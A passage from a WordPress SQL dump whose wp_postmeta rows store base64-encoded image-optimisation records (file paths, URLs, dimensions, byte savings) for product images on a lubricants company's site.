W50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTFcL3NodXR0ZXJzdG9ja181MjM0NzUzNDQtNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDY4OTksImlkIjozMTY4fV0='); 
INSERT INTO `wp_postmeta` VALUES (28710, 3167, 'wpfc_optimisation_reduction', '94526'); 
INSERT INTO `wp_postmeta` VALUES (28711, 3167, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMVwva3J5dG94LXhwLXBsYXN0aWMuanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzExXC9rcnl0b3gteHAtcGxhc3RpYy5qcGciLCJ3aWR0aCI6NTM2LCJoZWlnaHQiOjI3OCwibWltZV90eXBlIjoiIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTFcL2tyeXRveC14cC1wbGFzdGljLmpwZyIsInJlZHVjdGlvbiI6OTQ1MjEsInRpbWUiOjE0ODM1NDY5MTEsImlkIjoiMzE2NyJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMVwva3J5dG94LXhwLXBsYXN0aWMtMzQweDI3OC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjI3OCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzExXC9rcnl0b3gteHAtcGxhc3RpYy0zNDB4Mjc4LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTFcL2tyeXRveC14cC1wbGFzdGljLTM0MHgyNzguanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTQ2OTE1LCJpZCI6MzE2N30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzExXC9rcnl0b3gteHAtcGxhc3RpYy0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTFcL2tyeXRveC14cC1wbGFzdGljLTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMVwva3J5dG94LXhwLXBsYXN0aWMtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDY5MTcsImlkIjozMTY3fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTFcL2tyeXRveC14cC1wbGFzdGljLTIwMHgyMDAuanBnIiwid2lkdGgiOjIwMCwiaGVpZ2h0IjoyMDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMVwva3J5dG94LXhwLXBsYXN0aWMtMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzExXC9rcnl0b3gteHAtcGxhc3RpYy0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU0NjkxOSwiaWQiOjMxNjd9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMVwva3J5dG94LXhwLXBsYXN0aWMtMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzExXC9rcnl0b3gteHAtcGxhc3RpYy0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTFcL2tyeXRveC14cC1wbGFzdGljLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTQ2OTI5LCJpZCI6MzE2N30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzExXC9rcnl0b3gteHAtcGxhc3RpYy01MTB4Mjc4LmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6Mjc4LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTFcL2tyeXRveC14cC1wbGFzdGljLTUxMHgyNzguanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMVwva3J5dG94LXhwLXBsYXN0aWMtNTEweDI3OC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDY5MzIsImlkIjozMTY3fV0='); 
INSERT INTO `wp_postmeta` VALUES (28712, 3166, 'wpfc_optimisation_reduction', '58811'); 
INSERT INTO `wp_postmeta` VALUES (28713, 3166, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMVwva3J5dG94LXhwLWZpbmFsLWNvcnJvc2lvbi1yYXRpbmcuanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzExXC9rcnl0b3gteHAtZmluYWwtY29ycm9zaW9uLXJhdGluZy5qcGciLCJ3aWR0aCI6NTM0LCJoZWlnaHQiOjE4MiwibWltZV90eXBlIjoiIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTFcL2tyeXRveC14cC1maW5hbC1jb3Jyb3Npb24tcmF0aW5nLmpwZyIsInJlZHVjdGlvbiI6NTg4MDYsInRpbWUiOjE0ODM1NDY5NDMsImlkIjoiMzE2NiJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMVwva3J5dG94LXhwLWZpbmFsLWNvcnJvc2lvbi1yYXRpbmctMzQweDE4Mi5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjE4MiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzExXC9rcnl0b3gteHAtZmluYWwtY29ycm9zaW9uLXJhdGluZy0zNDB4MTgyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTFcL2tyeXRveC14cC1maW5hbC1jb3Jyb3Npb24tcmF0aW5nLTM0MHgxODIuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTQ2OTQ1LCJpZCI6MzE2Nn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzExXC9rcnl0b3gteHAtZmluYWwtY29ycm9zaW9uLXJhdGluZy0yNTB4MTgyLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MTgyLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTFcL2tyeXRveC14cC1maW5hbC1jb3Jyb3Npb24tcmF0aW5nLTI1MHgxODIuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMVwva3J5dG94LXhwLWZpbmFsLWNvcnJvc2lvbi1yYXRpbmctMjUweDE4Mi5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDY5NDgsImlkIjozMTY2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTFcL2tyeXRveC14cC1maW5hbC1jb3Jyb3Npb24tcmF0aW5nLTIwMHgxODIuanBnIiwid2lkdGgiOjIwMCwiaGVpZ2h0IjoxODIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMVwva3J5dG94LXhwLWZpbmFsLWNvcnJvc2lvbi1yYXRpbmctMjAweDE4Mi5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzExXC9rcnl0b3gteHAtZmluYWwtY29ycm9zaW9uLXJhdGluZy0yMDB4MTgyLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU0Njk1MSwiaWQiOjMxNjZ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMVwva3J5dG94LXhwLWZpbmFsLWNvcnJvc2lvbi1yYXRpbmctMjI1eDE4Mi5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjE4MiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzExXC9rcnl0b3gteHAtZmluYWwtY29ycm9zaW9uLXJhdGluZy0yMjV4MTgyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTFcL2tyeXRveC14cC1maW5hbC1jb3Jyb3Npb24tcmF0aW5nLTIyNXgxODIuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTQ2OTUzLCJpZCI6MzE2Nn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzExXC9rcnl0b3gteHAtZmluYWwtY29ycm9zaW9uLXJhdGluZy01MTB4MTgyLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6MTgyLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTFcL2tyeXRveC14cC1maW5hbC1jb3Jyb3Npb24tcmF0aW5nLTUxMHgxODIuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMVwva3J5dG94LXhwLWZpbmFsLWNvcnJvc2lvbi1yYXRpbmctNTEweDE4Mi5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDY5NTgsImlkIjozMTY2fV0='); 
INSERT INTO `wp_postmeta` VALUES (28714, 3165, 'wpfc_optimisation_reduction', '89592'); 
INSERT INTO `wp_postmeta` VALUES (28715, 3165, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMVwva3J5dG94LXhwLWdyZWFzZS10ZXN0LmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMVwva3J5dG94LXhwLWdyZWFzZS10ZXN0LmpwZyIsIndpZHRoIjo2NzIsImhlaWdodCI6MjYzLCJtaW1lX3R5cGUiOiIiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMVwva3J5dG94LXhwLWdyZWFzZS10ZXN0LmpwZyIsInJlZHVjdGlvbiI6ODk1ODcsInRpbWUiOjE0ODM1NDY5NjUsImlkIjoiMzE2NSJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMVwva3J5dG94LXhwLWdyZWFzZS10ZXN0LTM0MHgyNjMuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjoyNjMsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMVwva3J5dG94LXhwLWdyZWFzZS10ZXN0LTM0MHgyNjMuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMVwva3J5dG94LXhwLWdyZWFzZS10ZXN0LTM0MHgyNjMuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTQ2OTY4LCJpZCI6MzE2NX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzExXC9rcnl0b3gteHAtZ3JlYXNlLXRlc3QtMjUweDI1MC5qcGciLCJ3aWR0aCI6MjUwLCJoZWlnaHQiOjI1MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzExXC9rcnl0b3gteHAtZ3JlYXNlLXRlc3QtMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzExXC9rcnl0b3gteHAtZ3JlYXNlLXRlc3QtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDY5NzAsImlkIjozMTY1fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTFcL2tyeXRveC14cC1ncmVhc2UtdGVzdC0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTFcL2tyeXRveC14cC1ncmVhc2UtdGVzdC0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTFcL2tyeXRveC14cC1ncmVhc2UtdGVzdC0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU0Njk3MiwiaWQiOjMxNjV9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMVwva3J5dG94LXhwLWdyZWFzZS10ZXN0LTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMVwva3J5dG94LXhwLWdyZWFzZS10ZXN0LTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMVwva3J5dG94LXhwLWdyZWFzZS10ZXN0LTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTQ2OTc0LCJpZCI6MzE2NX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzExXC9rcnl0b3gteHAtZ3JlYXNlLXRlc3QtNTEweDI2My5qcGciLCJ3aWR0aCI6NTEwLCJoZWlnaHQiOjI2MywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzExXC9rcnl0b3gteHAtZ3JlYXNlLXRlc3QtNTEweDI2My5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzExXC9rcnl0b3gteHAtZ3JlYXNlLXRlc3QtNTEweDI2My5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDY5NzcsImlkIjozMTY1fV0='); 
INSERT INTO `wp_postmeta` VALUES (28716, 3164, 'wpfc_optimisation_reduction', '75469'); 
INSERT INTO `wp_postmeta` VALUES (28717, 3164, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMVwva3J5dG94LXhwLWxvYWQtd2Vhci1pbmRleC5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTFcL2tyeXRveC14cC1sb2FkLXdlYXItaW5kZXguanBnIiwid2lkdGgiOjY4MiwiaGVpZ2h0IjoxNzYsIm1pbWVfdHlwZSI6IiIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzExXC9rcnl0b3gteHAtbG9hZC13ZWFyLWluZGV4LmpwZyIsInJlZHVjdGlvbiI6NzU0NjQsInRpbWUiOjE0ODM1NDY5ODYsImlkIjoiMzE2NCJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMVwva3J5dG94LXhwLWxvYWQtd2Vhci1pbmRleC0zNDB4MTc2LmpwZyIsIndpZHRoIjozNDAsImhlaWdodCI6MTc2LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTFcL2tyeXRveC14cC1sb2FkLXdlYXItaW5kZXgtMzQweDE3Ni5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzExXC9rcnl0b3gteHAtbG9hZC13ZWFyLWluZGV4LTM0MHgxNzYuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTQ2OTg4LCJpZCI6MzE2NH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzExXC9rcnl0b3gteHAtbG9hZC13ZWFyLWluZGV4LTI1MHgxNzYuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoxNzYsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMVwva3J5dG94LXhwLWxvYWQtd2Vhci1pbmRleC0yNTB4MTc2LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTFcL2tyeXRveC14cC1sb2FkLXdlYXItaW5kZXgtMjUweDE3Ni5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDY5OTAsImlkIjozMTY0fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTFcL2tyeXRveC14cC1sb2FkLXdlYXItaW5kZXgtMjAweDE3Ni5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjE3NiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzExXC9rcnl0b3gteHAtbG9hZC13ZWFyLWluZGV4LTIwMHgxNzYuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMVwva3J5dG94LXhwLWxvYWQtd2Vhci1pbmRleC0yMDB4MTc2LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU0Njk5MywiaWQiOjMxNjR9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMVwva3J5dG94LXhwLWxvYWQtd2Vhci1pbmRleC0yMjV4MTc2LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MTc2LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTFcL2tyeXRveC14cC1sb2FkLXdlYXItaW5kZXgtMjI1eDE3Ni5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzExXC9rcnl0b3gteHAtbG9hZC13ZWFyLWluZGV4LTIyNXgxNzYuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTQ2OTk1LCJpZCI6MzE2NH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzExXC9rcnl0b3gteHAtbG9hZC13ZWFyLWluZGV4LTUxMHgxNzYuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0IjoxNzYsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMVwva3J5dG94LXhwLWxvYWQtd2Vhci1pbmRleC01MTB4MTc2LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTFcL2tyeXRveC14cC1sb2FkLXdlYXItaW5kZXgtNTEweDE3Ni5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDY5OTgsImlkIjozMTY0fV0='); 
INSERT INTO `wp_postmeta` VALUES (28718, 3163, 'wpfc_optimisation_reduction', '217813'); 
